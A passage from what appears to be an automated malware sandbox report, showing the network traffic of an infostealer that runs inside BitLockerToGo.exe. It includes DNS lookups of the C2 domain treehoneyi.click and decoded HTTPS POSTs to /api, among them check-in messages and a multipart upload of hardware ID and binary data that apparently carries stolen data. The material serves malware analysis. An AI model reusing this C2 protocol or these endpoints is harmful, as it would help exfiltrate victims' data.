                                                                                                                    Dec 26, 2024 12:01:40.521665096 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521677017 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521785975 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521805048 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521817923 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521833897 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.521935940 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521962881 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.521984100 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.563337088 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:40.563483000 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.563534021 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.563553095 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:40.607341051 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.176614046 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.176693916 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.176743984 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.176919937 CET49742443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.176934958 CET44349742172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.186593056 CET49743443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.186618090 CET44349743172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.186702967 CET49743443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.187083960 CET49743443192.168.2.4172.67.180.113
                                                                                                                    Dec 26, 2024 12:01:43.187097073 CET44349743172.67.180.113192.168.2.4
                                                                                                                    Dec 26, 2024 12:01:43.487771034 CET49743443192.168.2.4172.67.180.113

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 26, 2024 12:01:23.516125917 CET5819653192.168.2.41.1.1.1
                                                                                                                    Dec 26, 2024 12:01:23.891695023 CET53581961.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 26, 2024 12:01:23.516125917 CET192.168.2.41.1.1.10x1420Standard query (0)treehoneyi.clickA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 26, 2024 12:01:23.891695023 CET1.1.1.1192.168.2.40x1420No error (0)treehoneyi.click172.67.180.113A (IP address)IN (0x0001)false
                                                                                                                    Dec 26, 2024 12:01:23.891695023 CET1.1.1.1192.168.2.40x1420No error (0)treehoneyi.click104.21.91.209A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • treehoneyi.click

                                                                                                                    HTTPS Proxied Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449735172.67.180.1134437676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-26 11:01:25 UTC263OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-12-26 11:01:25 UTC1125INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 26 Dec 2024 11:01:25 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=84r2i3qg0qqfmo101e1qh1uuc4; expires=Mon, 21 Apr 2025 04:48:04 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJI3JdU1nK12gPV4DmKgKAdwhldrjXnpQyS%2FMK%2BqGeufsR7mcLmIbL93lwWgYiEuHm12KpLzK53Jnoj5%2FLL%2FSZqhtMiNkIKhTr1enJnh3TDHyEXbf%2FEmbJMi3PzCEggVyKR6"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f8092a25f6e0cc4-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1585&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1818181&cwnd=147&unsent_bytes=0&cid=775e93d7c43ce272&ts=794&x=0"
                                                                                                                    2024-12-26 11:01:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                    Data Ascii: 2ok
                                                                                                                    2024-12-26 11:01:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449737172.67.180.1134437676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-26 11:01:27 UTC264OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 47
                                                                                                                    Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:27 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 72 41 47 78 53 46 2d 2d 73 68 65 65 76 26 6a 3d
                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=rAGxSF--sheev&j=
                                                                                                                    2024-12-26 11:01:28 UTC1117INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 26 Dec 2024 11:01:28 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=orejp4cslu4h4ecenbtuerp2du; expires=Mon, 21 Apr 2025 04:48:06 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W01ROky7airUeMtjODVBXPRwjSw341Nb4KxgcIpwjhHXieSITmpioxiVMIGpU154ClpD9q7tvK21Nr%2ByaIBFNyHBqsREuxgBGTG3S8WHRKQg9msNSBNCho82DFkTALrCs03w"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f8092afcdccc339-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1624&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=947&delivery_rate=1765417&cwnd=247&unsent_bytes=0&cid=293e97ac6cd4f606&ts=817&x=0"
                                                                                                                    2024-12-26 11:01:28 UTC252INData Raw: 34 36 36 0d 0a 70 51 46 6c 51 4a 72 79 6c 52 51 39 6a 49 32 54 30 43 31 64 68 64 50 53 45 6e 34 34 35 61 4c 42 44 4a 56 38 66 38 74 43 79 54 76 65 49 78 4e 69 6f 4d 61 35 4e 6b 37 70 72 36 6d 6b 58 79 6a 67 2f 2f 42 7a 47 68 72 66 78 4b 42 67 35 68 6c 54 36 54 53 6b 47 5a 39 6e 42 43 7a 70 6c 37 6b 32 57 50 53 76 71 59 74 57 66 2b 43 39 38 43 68 63 58 59 2f 41 6f 47 44 33 48 52 53 6b 4d 71 56 59 7a 57 30 43 4b 50 2b 52 38 58 56 52 34 65 6a 32 74 55 77 33 36 37 71 2f 65 68 4d 61 79 59 43 6b 64 72 64 47 58 59 59 6e 76 56 72 6f 59 42 59 72 75 49 2b 35 62 78 2f 70 34 37 48 71 44 7a 7a 67 73 62 35 30 47 6c 4f 4e 79 71 6c 6f 39 68 67 56 75 79 75 76 55 38 31 6a 41 53 6e 31 6d 4f 56 34 57 2b 62 6a 38 4c 39 4d 66 36 6e 78 74 32 68 63 41 73 65 54 6b 57 33
                                                                                                                    Data Ascii: 466pQFlQJrylRQ9jI2T0C1dhdPSEn445aLBDJV8f8tCyTveIxNioMa5Nk7pr6mkXyjg//BzGhrfxKBg5hlT6TSkGZ9nBCzpl7k2WPSvqYtWf+C98ChcXY/AoGD3HRSkMqVYzW0CKP+R8XVR4ej2tUw367q/ehMayYCkdrdGXYYnvVroYBYruI+5bx/p47HqDzzgsb50GlONyqlo9hgVuyuvU81jASn1mOV4W+bj8L9Mf6nxt2hcAseTkW3
                                                                                                                    2024-12-26 11:01:28 UTC881INData Raw: 6d 44 77 69 6b 4d 4b 30 5a 32 43 30 65 59 76 2b 63 74 79 34 66 35 75 50 2f 74 30 77 77 34 4c 43 77 59 68 4e 61 68 4d 69 72 61 76 30 52 45 71 59 75 6f 56 37 50 61 67 41 74 2f 35 6a 78 65 56 79 75 6f 62 47 31 56 33 2b 2f 38 5a 42 67 48 31 6d 54 7a 62 49 75 36 46 41 45 36 53 65 6e 47 5a 38 6a 41 53 7a 35 6e 66 64 6b 56 2b 58 6b 39 4b 42 45 4e 75 71 38 73 48 30 57 56 59 54 41 70 47 54 39 45 52 65 74 4c 61 5a 66 78 32 4e 48 62 4c 69 58 37 7a 59 48 72 73 7a 30 6f 6b 67 7a 38 66 4f 4b 4d 41 4d 55 6e 6f 43 6b 59 72 64 47 58 61 45 6c 71 46 72 4d 62 41 51 71 38 34 4c 33 5a 46 6e 6a 36 75 4f 30 53 6a 48 74 73 71 4a 36 45 6c 79 45 79 61 68 6e 38 68 6b 5a 36 57 37 72 58 74 38 6a 58 32 4c 5a 6e 66 78 36 56 66 6e 76 73 61 30 42 4a 71 65 32 76 44 42 45 47 6f 50 42 70 32
                                                                                                                    Data Ascii: mDwikMK0Z2C0eYv+cty4f5uP/t0ww4LCwYhNahMirav0REqYuoV7PagAt/5jxeVyuobG1V3+/8ZBgH1mTzbIu6FAE6SenGZ8jASz5nfdkV+Xk9KBENuq8sH0WVYTApGT9ERetLaZfx2NHbLiX7zYHrsz0okgz8fOKMAMUnoCkYrdGXaElqFrMbAQq84L3ZFnj6uO0SjHtsqJ6ElyEyahn8hkZ6W7rXt8jX2LZnfx6Vfnvsa0BJqe2vDBEGoPBp2
                                                                                                                    2024-12-26 11:01:28 UTC1369INData Raw: 34 34 62 36 0d 0a 56 66 43 75 53 2f 76 6e 63 4b 47 70 69 4f 75 69 37 77 45 6c 33 78 59 4b 52 57 79 47 73 48 49 2f 79 64 38 33 64 53 34 75 62 79 76 6b 4d 33 36 72 32 30 66 78 52 53 68 4d 69 78 59 50 6b 59 47 36 6b 6c 36 78 65 48 5a 42 39 69 6f 4e 44 54 65 45 6a 36 35 4c 4f 48 54 44 48 70 74 71 59 77 41 78 53 65 67 4b 52 69 74 30 5a 64 70 79 32 67 56 63 42 71 42 69 48 34 6d 76 6c 35 56 65 62 6e 38 62 39 4f 4e 4f 2b 33 76 58 73 54 56 59 44 49 6f 47 4c 79 45 78 37 70 62 75 74 65 33 79 4e 66 59 74 32 65 39 47 64 4f 72 4e 72 79 76 45 45 34 38 66 47 76 50 67 55 61 67 4d 7a 6a 4e 72 63 55 47 71 34 6b 70 6c 50 45 5a 77 4d 76 39 35 6e 2b 66 30 33 6b 34 2f 2b 67 51 6a 58 69 76 37 78 31 45 31 71 47 77 61 31 6b 2f 46 35 54 36 53 65 7a 47 5a 38 6a 4b 43 2f 6f 67 76 31
                                                                                                                    Data Ascii: 44b6VfCuS/vncKGpiOui7wEl3xYKRWyGsHI/yd83dS4ubyvkM36r20fxRShMixYPkYG6kl6xeHZB9ioNDTeEj65LOHTDHptqYwAxSegKRit0Zdpy2gVcBqBiH4mvl5Vebn8b9ONO+3vXsTVYDIoGLyEx7pbute3yNfYt2e9GdOrNryvEE48fGvPgUagMzjNrcUGq4kplPEZwMv95n+f03k4/+gQjXiv7x1E1qGwa1k/F5T6SezGZ8jKC/ogv1
                                                                                                                    2024-12-26 11:01:28 UTC1369INData Raw: 62 47 31 56 33 2b 2f 38 5a 39 7a 43 6c 44 48 33 2b 31 33 74 78 6b 52 36 58 6a 72 55 38 74 6e 42 43 37 78 6e 50 70 33 57 2b 6e 69 39 62 4a 4a 4f 65 4b 77 75 33 67 51 56 59 33 4d 70 32 4c 2b 47 42 47 71 49 36 30 5a 69 53 4d 41 4f 72 6a 49 74 31 64 53 35 65 50 78 73 56 34 34 70 2f 2f 77 66 68 70 61 78 35 69 31 66 75 41 5a 41 75 63 35 36 31 37 4c 49 31 39 69 38 6f 4c 79 65 46 76 6b 36 76 57 2b 52 54 2f 69 6f 37 68 32 47 31 61 50 78 61 78 6f 38 68 4d 61 6f 69 4f 35 53 38 52 6e 43 53 36 34 33 72 64 78 52 36 36 33 73 5a 64 59 50 50 65 33 73 7a 41 44 46 4a 36 41 70 47 4b 33 52 6c 32 70 4c 71 64 53 77 47 67 4d 4a 76 79 51 2b 6e 31 52 34 4f 62 39 75 6b 4d 34 39 62 79 31 65 42 5a 54 67 73 79 75 62 65 55 64 48 4f 6c 75 36 31 37 66 49 31 39 69 33 36 50 41 56 52 2f 78
                                                                                                                    Data Ascii: bG1V3+/8Z9zClDH3+13txkR6XjrU8tnBC7xnPp3W+ni9bJJOeKwu3gQVY3Mp2L+GBGqI60ZiSMAOrjIt1dS5ePxsV44p//wfhpax5i1fuAZAuc5617LI19i8oLyeFvk6vW+RT/io7h2G1aPxaxo8hMaoiO5S8RnCS643rdxR663sZdYPPe3szADFJ6ApGK3Rl2pLqdSwGgMJvyQ+n1R4Ob9ukM49by1eBZTgsyubeUdHOlu617fI19i36PAVR/x
                                                                                                                    2024-12-26 11:01:28 UTC1369INData Raw: 67 6e 70 2b 6e 77 58 42 39 56 6a 49 43 38 49 4f 35 65 47 71 56 67 38 78 6e 41 61 77 38 73 2b 35 62 38 65 6c 50 76 35 76 65 33 52 7a 6a 6f 74 72 6c 33 48 46 79 56 78 36 35 6e 39 78 55 55 6f 79 53 71 55 6f 63 74 52 79 58 67 30 4b 38 32 62 65 6e 35 34 62 45 50 49 4b 6d 6f 38 48 63 51 47 74 2b 41 72 6e 7a 32 47 77 2b 74 4c 36 42 4c 7a 47 55 48 4a 2b 71 58 2b 33 78 51 37 65 66 38 73 55 63 74 35 37 79 77 59 67 35 63 6a 4d 37 6a 49 4c 63 5a 42 65 6c 34 36 32 6a 51 61 45 63 39 74 6f 6d 33 63 56 4f 75 74 37 47 78 52 54 4c 70 6f 37 52 32 46 31 6d 4a 79 4b 5a 6d 38 78 51 51 70 69 75 68 55 4d 39 6a 43 43 66 77 6d 2f 46 34 58 75 6a 6a 2f 50 49 42 66 2b 43 70 38 43 68 63 66 5a 33 4e 70 58 6e 6d 4b 78 71 70 63 65 74 47 69 58 70 48 4a 66 54 51 72 7a 5a 53 34 75 58 38 74
                                                                                                                    Data Ascii: gnp+nwXB9VjIC8IO5eGqVg8xnAaw8s+5b8elPv5ve3Rzjotrl3HFyVx65n9xUUoySqUoctRyXg0K82ben54bEPIKmo8HcQGt+Arnz2Gw+tL6BLzGUHJ+qX+3xQ7ef8sUct57ywYg5cjM7jILcZBel462jQaEc9tom3cVOut7GxRTLpo7R2F1mJyKZm8xQQpiuhUM9jCCfwm/F4Xujj/PIBf+Cp8ChcfZ3NpXnmKxqpcetGiXpHJfTQrzZS4uX8t
                                                                                                                    2024-12-26 11:01:28 UTC1369INData Raw: 78 72 7a 34 46 47 6f 44 4d 34 7a 61 33 45 42 43 76 49 61 70 52 7a 32 4d 42 4b 50 79 54 2f 6e 56 59 35 2b 6e 36 73 55 55 77 34 4c 65 30 63 42 64 64 69 63 61 6d 5a 66 35 65 55 2b 6b 6e 73 78 6d 66 49 79 45 42 36 6f 4c 46 65 46 7a 31 72 2b 37 38 56 6e 2f 67 76 66 41 6f 58 46 47 50 7a 37 46 72 2f 68 59 5a 6f 43 43 76 55 38 70 6b 42 79 66 31 6c 66 4e 34 57 2b 6e 76 2f 62 31 49 4e 2b 69 31 73 48 39 63 46 4d 66 48 75 79 36 76 58 6a 32 69 4e 6f 70 58 7a 48 46 48 50 62 61 4a 74 33 46 54 72 72 65 78 76 45 59 2b 37 37 2b 38 65 42 68 49 68 38 75 71 59 66 59 52 48 61 6f 68 6f 56 48 56 5a 51 63 70 38 4a 66 2f 63 6c 48 38 37 76 37 79 41 58 2f 67 71 66 41 6f 58 47 75 52 78 36 52 68 74 54 63 61 73 69 47 68 57 73 78 76 52 7a 32 32 69 62 64 78 55 36 36 33 73 62 39 44 4d 75
                                                                                                                    Data Ascii: xrz4FGoDM4za3EBCvIapRz2MBKPyT/nVY5+n6sUUw4Le0cBddicamZf5eU+knsxmfIyEB6oLFeFz1r+78Vn/gvfAoXFGPz7Fr/hYZoCCvU8pkByf1lfN4W+nv/b1IN+i1sH9cFMfHuy6vXj2iNopXzHFHPbaJt3FTrrexvEY+77+8eBhIh8uqYfYRHaohoVHVZQcp8Jf/clH87v7yAX/gqfAoXGuRx6RhtTcasiGhWsxvRz22ibdxU663sb9DMu
                                                                                                                    2024-12-26 11:01:28 UTC1369INData Raw: 47 31 62 48 6d 4f 4e 6c 2b 52 73 63 70 53 71 73 56 39 56 69 44 53 37 35 6c 2f 42 39 54 65 58 39 2b 72 70 4d 4d 65 2b 34 73 48 34 63 57 34 72 41 34 79 43 33 47 51 58 70 65 4f 74 38 35 48 51 52 4b 4c 71 7a 34 47 42 56 36 65 50 6e 75 55 34 38 38 62 79 67 4d 46 49 61 6c 73 65 79 4c 71 38 49 44 62 34 6e 74 42 66 65 49 77 41 75 75 4d 69 33 66 56 44 67 34 76 71 32 52 6a 72 76 73 72 56 31 46 6c 61 4c 77 61 74 6e 2f 52 73 59 72 79 71 6f 56 38 68 69 43 79 62 78 6e 76 34 32 45 61 37 6f 36 66 49 58 66 39 47 68 74 32 67 52 53 73 58 79 6f 48 2f 6d 43 78 43 35 4a 75 6c 32 78 47 38 45 4a 2f 2b 41 74 32 6b 52 39 36 2f 32 76 67 39 6e 70 37 47 30 66 42 39 64 69 63 2b 75 59 66 41 56 45 71 4d 75 75 56 62 43 61 77 73 71 39 59 4c 39 66 45 33 6e 35 76 79 38 52 79 33 6b 38 66 34
                                                                                                                    Data Ascii: G1bHmONl+RscpSqsV9ViDS75l/B9TeX9+rpMMe+4sH4cW4rA4yC3GQXpeOt85HQRKLqz4GBV6ePnuU488bygMFIalseyLq8IDb4ntBfeIwAuuMi3fVDg4vq2RjrvsrV1FlaLwatn/RsYryqoV8hiCybxnv42Ea7o6fIXf9Ght2gRSsXyoH/mCxC5Jul2xG8EJ/+At2kR96/2vg9np7G0fB9dic+uYfAVEqMuuVbCawsq9YL9fE3n5vy8Ry3k8f4
                                                                                                                    2024-12-26 11:01:28 UTC1369INData Raw: 63 32 69 62 66 6c 63 4c 4c 38 74 75 31 72 43 5a 44 6b 63 39 70 66 6a 63 56 48 6f 37 37 48 38 44 7a 43 6e 36 59 6b 77 56 42 71 34 6a 75 4e 32 74 30 5a 64 6e 43 4f 6c 56 38 42 31 46 6d 2f 62 68 2b 46 38 52 4b 7a 4a 39 71 4e 47 4b 65 71 6a 38 44 35 63 58 4d 65 59 38 79 43 33 47 67 7a 70 65 50 73 4c 6e 44 5a 55 64 61 6a 43 36 44 68 47 72 76 6d 78 36 68 31 78 70 36 50 77 4b 46 77 64 68 4e 4b 78 61 50 51 49 48 75 34 65 6c 58 6e 4d 64 51 59 76 38 35 7a 4a 53 45 72 74 34 66 2b 31 57 53 36 6e 2f 2f 42 2f 58 41 4b 2b 67 4f 73 75 79 46 42 64 73 57 44 7a 47 66 4a 67 43 53 7a 2f 68 75 59 37 66 2b 58 35 38 4c 39 45 4d 36 57 77 76 57 41 62 47 73 6d 41 70 53 36 76 54 6c 50 70 4a 4c 6f 5a 6e 7a 4e 56 65 61 33 44 6f 43 59 4e 38 61 48 6f 38 6c 6c 2f 76 2b 50 2b 4d 41 34 61
                                                                                                                    Data Ascii: c2ibflcLL8tu1rCZDkc9pfjcVHo77H8DzCn6YkwVBq4juN2t0ZdnCOlV8B1Fm/bh+F8RKzJ9qNGKeqj8D5cXMeY8yC3GgzpePsLnDZUdajC6DhGrvmx6h1xp6PwKFwdhNKxaPQIHu4elXnMdQYv85zJSErt4f+1WS6n//B/XAK+gOsuyFBdsWDzGfJgCSz/huY7f+X58L9EM6WwvWAbGsmApS6vTlPpJLoZnzNVea3DoCYN8aHo8ll/v+P+MA4a
                                                                                                                    2024-12-26 11:01:28 UTC1369INData Raw: 6a 6d 55 79 69 71 4d 61 68 5a 7a 43 4e 4a 59 76 37 51 72 79 51 52 72 75 76 67 38 68 64 76 74 65 72 6c 49 30 73 4b 31 64 2f 74 64 37 63 49 58 66 46 79 35 52 6e 56 49 31 39 69 76 35 50 6c 5a 46 6e 74 2b 66 4c 31 63 51 48 42 73 72 64 32 48 31 53 51 30 65 46 42 39 42 55 52 70 53 65 39 5a 2f 6c 32 42 43 7a 32 6c 2b 46 6e 48 36 43 76 2f 76 49 58 42 71 65 67 75 6e 64 51 45 73 76 52 73 47 44 38 43 42 72 70 48 2b 55 5a 33 79 4e 66 59 73 32 54 2b 58 68 59 2b 50 36 38 6c 45 77 34 34 62 4b 2b 5a 77 30 61 79 59 43 6c 4c 71 39 4d 55 2b 6b 6b 75 68 6d 66 4d 31 56 35 72 63 4f 67 4a 67 33 78 6f 65 6a 79 57 58 2b 2f 34 76 34 77 44 68 72 66 67 4f 52 67 2b 68 38 65 70 79 4f 35 53 38 46 67 45 53 47 2f 72 73 6c 54 55 75 50 71 2f 37 56 78 41 63 61 37 6f 48 30 54 58 62 6e 2b 6c
                                                                                                                    Data Ascii: jmUyiqMahZzCNJYv7QryQRruvg8hdvterlI0sK1d/td7cIXfFy5RnVI19iv5PlZFnt+fL1cQHBsrd2H1SQ0eFB9BURpSe9Z/l2BCz2l+FnH6Cv/vIXBqegundQEsvRsGD8CBrpH+UZ3yNfYs2T+XhY+P68lEw44bK+Zw0ayYClLq9MU+kkuhmfM1V5rcOgJg3xoejyWX+/4v4wDhrfgORg+h8epyO5S8FgESG/rslTUuPq/7VxAca7oH0TXbn+l


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449738172.67.180.1134437676C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-26 11:01:30 UTC275OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=QN7TZRE36WB
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 18121
                                                                                                                    Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:30 UTC15331OUTData Raw: 2d 2d 51 4e 37 54 5a 52 45 33 36 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 4e 37 54 5a 52 45 33 36 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 4e 37 54 5a 52 45 33 36 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d 2d 51 4e 37 54 5a 52 45 33 36 57 42 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: --QN7TZRE36WBContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--QN7TZRE36WBContent-Disposition: form-data; name="pid"2--QN7TZRE36WBContent-Disposition: form-data; name="lid"rAGxSF--sheev--QN7TZRE36WBCont
                                                                                                                    2024-12-26 11:01:30 UTC2790OUTData Raw: 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52
                                                                                                                    Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                                    2024-12-26 11:01:31 UTC1125INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 26 Dec 2024 11:01:31 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=l706ihauukhrigbame83rh6i3r; expires=Mon, 21 Apr 2025 04:48:09 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=InEgV%2FS92SYTCq5TGLxGBMiiPtLTHw43AZcAlmqnDwwB21Ozv1%2BiTin14Nrxs6Ca17oU62u2jPM9IR4frsWR1UGv6leJlq7bgC4bFJ35TnVofz2Q35ydmrkk9oH1gN%2F2K31x"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f8092c0ba3a0cb2-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
